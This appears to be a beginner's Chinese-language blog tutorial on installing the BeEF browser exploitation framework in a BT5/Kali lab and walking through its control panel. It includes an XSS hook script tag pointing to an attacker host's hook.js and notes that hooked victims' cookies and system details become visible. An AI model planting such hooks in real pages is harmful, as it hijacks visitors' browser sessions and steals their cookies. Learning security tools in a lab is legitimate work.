BeEf新手向
写在前面
上学期第一次接触到XSS,然后就知道了BeEf这个工具,一直对BeEf很好奇。本文主要是作者作为新手记录学习用的,所以介绍的主要就是BeEf的使用,并没有涉及到底层。新手上路,求轻喷。
BeEF简介
- 是什么?
BeEf,The Browser Exploitation Framework缩写,攻击者可以对目标进行攻击测试,攻击成功以后会加载浏览器劫持会话,它扩展了跨站漏洞的利用,能HOOK很多浏览器(IE和Firefox等)并可以执行很多内嵌命令。
环境:BT5 【或者Kali】
安装
删除BT5上面自带的版本稍旧的BeEF【kali上也有自带的beef】
rm -rf /pentest/web/beef-ng
git clone https://github.com/beefproject/beef
cd /pentest/web/beef
./beef
然后要开启apache
apache2 start
接着就访问返回信息中的登录地址http://localIP:3000/ui/panel,可以看到一个登录界面,默认账号/密码:beef/beef
这里有个小插曲,我在打开http://192.168.137.134:3000/ui/panel的时候,一直没有显示什么登录框,就以为是安装出了错,原来是我的fx设置了安全限制
访问+测试
访问测试网址http://ip:3000//demos/basic.html,就是说,如果一个网站有XSS漏洞,然后你通过某种方式把你的(钓鱼)网址发到这个有XSS漏洞的页面,受害者点击或者直接访问那个界面时,就会跳转到你构造的钓鱼界面
页面源代码要有
<script src="http://攻击主机IP:3000/hook.js"></script>
接着我们就可以在我们的beef上看到有受害者登录了
各个部分解析
Logs
日志,顾名思义,就是记录所有登录过的肉鸡【访问钓鱼网站的机器】
又有问题了——我想用我的物理机访问BT5上的测试网址,然后发现互ping都可以ping得通,就是访问不了。解决方法就是在NAT模式下,添加一个映射端口,接着就物理机和另一台虚拟机【win 2K3】都可以访问了
Current Browser
Details
可以看到肉鸡的详细信息,包括浏览器信息【版本号等】、访问的页面信息【有cookie!!】以及肉鸡的系统信息
Logs
跟上面那个不一样,这里只是当前肉鸡的操作信息